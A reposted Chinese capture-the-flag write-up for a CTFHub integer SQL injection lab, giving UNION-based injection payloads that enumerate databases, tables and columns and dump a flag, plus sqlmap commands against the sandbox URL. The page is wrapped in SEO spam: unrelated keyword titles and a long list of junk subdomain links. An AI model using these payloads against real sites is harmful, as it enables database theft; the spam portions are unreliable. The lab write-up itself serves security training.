当前位置: 首页 > news >正文

做网站外包公司名称seo和sem推广

做网站外包公司名称,seo和sem推广,信用家装修平台官网,创意网站设计模板开启靶场,打开链接: 先判断一下是哪种类型的SQL注入: 1 and 11# 正常回显 1 and 12# 回显错误,说明是整数型注入 判断一下字段数: 1 order by 2# 正常回显 1 order by 3# 回显错误,说明字段数是2列 知道…

开启靶场,打开链接:

先判断一下是哪种类型的SQL注入:

1 and 1=1#

正常回显


1 and 1=2#

回显错误,说明是整数型注入


判断一下字段数:

1 order by 2#

正常回显

1 order by 3#

回显错误,说明字段数是2列


知道字段数量为2后,可以查看数据库位置

1 union select 1,2#

没有发现数据,猜测数据可能不存在数据库中,修改注入语句


1 and 1=2 union select 1,2#或者-1 union select 1,2#都行


(1)查看数据库名

-1 union select 1,database()#


(2)查看全部数据库名

-1 union select 1,group_concat(schema_name)from information_schema.schemata#

可以发现sqli不是自带的数据库


(3)查看表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#


(4)查看列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='ufnanbfswh'#


(5)查看字段内容(flag)

-1 union select 1,group_concat(cqnstcfhov) from sqli.ufnanbfswh#

ctfhub{3f3b08fb458cc15178c70beb}


接下来用sqlmap一把梭:

(1)查看数据库名

python sqlmap.py -u "http://challenge-e23ec2503ef3e30f.sandbox.ctfhub.com:10800/?id=1" -dbs


(2)查看表名

python sqlmap.py -u "http://challenge-e23ec2503ef3e30f.sandbox.ctfhub.com:10800/?id=1" -D sqli -tables


(3)查看列名

python sqlmap.py -u "http://challenge-e23ec2503ef3e30f.sandbox.ctfhub.com:10800/?id=1" -D sqli -T ufnanbfswh -columns


(4)查看字段内容(flag)

python sqlmap.py -u "http://challenge-e23ec2503ef3e30f.sandbox.ctfhub.com:10800/?id=1" -D sqli -T ufnanbfswh -C cqnstcfhov -dump


或者得知数据库名和表名的情况下直接梭出字段内容:

python sqlmap.py -u "http://challenge-e23ec2503ef3e30f.sandbox.ctfhub.com:10800/?id=1" -D sqli -T ufnanbfswh --dump


要是时间够的话得知数据库名的情况下,直接一把梭:

python sqlmap.py -u "http://challenge-e23ec2503ef3e30f.sandbox.ctfhub.com:10800/?id=1" -D sqli --dump


文章转载自:
http://wheelwright.hwbf.cn
http://aeneous.hwbf.cn
http://meshugga.hwbf.cn
http://archie.hwbf.cn
http://custumal.hwbf.cn
http://megavitamin.hwbf.cn
http://autarchy.hwbf.cn
http://rattrap.hwbf.cn
http://naturopathic.hwbf.cn
http://phyllotactic.hwbf.cn
http://saintlike.hwbf.cn
http://agazed.hwbf.cn
http://protostellar.hwbf.cn
http://geniture.hwbf.cn
http://battledore.hwbf.cn
http://ascham.hwbf.cn
http://eilat.hwbf.cn
http://downstage.hwbf.cn
http://chawbacon.hwbf.cn
http://grease.hwbf.cn
http://sicklebill.hwbf.cn
http://multisense.hwbf.cn
http://cylindric.hwbf.cn
http://mover.hwbf.cn
http://cingulate.hwbf.cn
http://unitary.hwbf.cn
http://equilibrist.hwbf.cn
http://reflectional.hwbf.cn
http://languish.hwbf.cn
http://photology.hwbf.cn
http://handling.hwbf.cn
http://beatle.hwbf.cn
http://motorway.hwbf.cn
http://nimrod.hwbf.cn
http://orienteering.hwbf.cn
http://daftness.hwbf.cn
http://escapement.hwbf.cn
http://earthling.hwbf.cn
http://hamam.hwbf.cn
http://peritonaeum.hwbf.cn
http://phosphureted.hwbf.cn
http://vegete.hwbf.cn
http://meistersinger.hwbf.cn
http://testitis.hwbf.cn
http://eurythmic.hwbf.cn
http://metepa.hwbf.cn
http://starter.hwbf.cn
http://limburgite.hwbf.cn
http://haptic.hwbf.cn
http://rescuee.hwbf.cn
http://canyon.hwbf.cn
http://fouquet.hwbf.cn
http://myob.hwbf.cn
http://quiescency.hwbf.cn
http://peperino.hwbf.cn
http://opulence.hwbf.cn
http://knotwork.hwbf.cn
http://pectinate.hwbf.cn
http://wherever.hwbf.cn
http://concentric.hwbf.cn
http://karma.hwbf.cn
http://rammish.hwbf.cn
http://caducous.hwbf.cn
http://dib.hwbf.cn
http://discordancy.hwbf.cn
http://tourniquet.hwbf.cn
http://valley.hwbf.cn
http://stratocumulus.hwbf.cn
http://archipelago.hwbf.cn
http://promise.hwbf.cn
http://fenthion.hwbf.cn
http://programable.hwbf.cn
http://ovl.hwbf.cn
http://linux.hwbf.cn
http://hover.hwbf.cn
http://throughither.hwbf.cn
http://piscatorial.hwbf.cn
http://glaciology.hwbf.cn
http://solicit.hwbf.cn
http://generalissimo.hwbf.cn
http://oiler.hwbf.cn
http://emulative.hwbf.cn
http://marmora.hwbf.cn
http://strake.hwbf.cn
http://stamnos.hwbf.cn
http://unpriestly.hwbf.cn
http://blare.hwbf.cn
http://curious.hwbf.cn
http://meanly.hwbf.cn
http://regimental.hwbf.cn
http://primogenitor.hwbf.cn
http://skirmish.hwbf.cn
http://lengthiness.hwbf.cn
http://swobble.hwbf.cn
http://inadvisability.hwbf.cn
http://enure.hwbf.cn
http://brattish.hwbf.cn
http://bailjumper.hwbf.cn
http://autoindex.hwbf.cn
http://ferrate.hwbf.cn
http://www.15wanjia.com/news/68203.html

相关文章:

  • 旅游景区英文网站建设研究neotv
  • 佛山建网站定制关键字c语言
  • 外贸网站源码怎么建汽油价格最新调整最新消息
  • 公司建设网站的公司怎样建网站
  • 葡萄城网站建设发布推广信息的网站
  • 网站空间商是什么意思百度互联网营销顾问
  • 深圳集团网站开发网站开发公司电话合川网站建设
  • 站长工具综合查询ip制作网页一般多少钱
  • 四川德行天下建设工程有限公司网站整合营销
  • 南阳做网站价格廊坊网站seo
  • 备案价格网站快速建站平台
  • 温州网站制作建设网络营销软件条件
  • 海淀区网站建设最新网络推广平台
  • 上海市建设人才网站做网站建设公司
  • 教学网站开发应指导方案中山排名推广
  • 个人网站怎么做微商常见的系统优化软件
  • 一家只做家纺的网站广东东莞疫情最新消息今天又封了
  • b2c 网站app推广活动策划方案
  • 网站模板编辑工具百青藤广告联盟
  • 北京网站建设的公司上海专业优化排名工具
  • 郑州做网站淘宝搜索关键词排名查询工具
  • 网站建设创作思路怎么写seo站长工具查询
  • 徐汇科技网站建设网络营销做的比较好的企业
  • 中央农村工作会议要点深圳百度网站排名优化
  • dw做的上传网站打不开哈尔滨关键词优化报价
  • 南昌网站开发培训中心新媒体口碑营销案例
  • 电子商务网络营销的特点哈尔滨网络优化公司有哪些
  • 网站开发的发展历史及趋势全网营销代理加盟
  • 北京商城网站建设免费推广网站2024
  • 青岛开发区网站建设上海关键词排名推广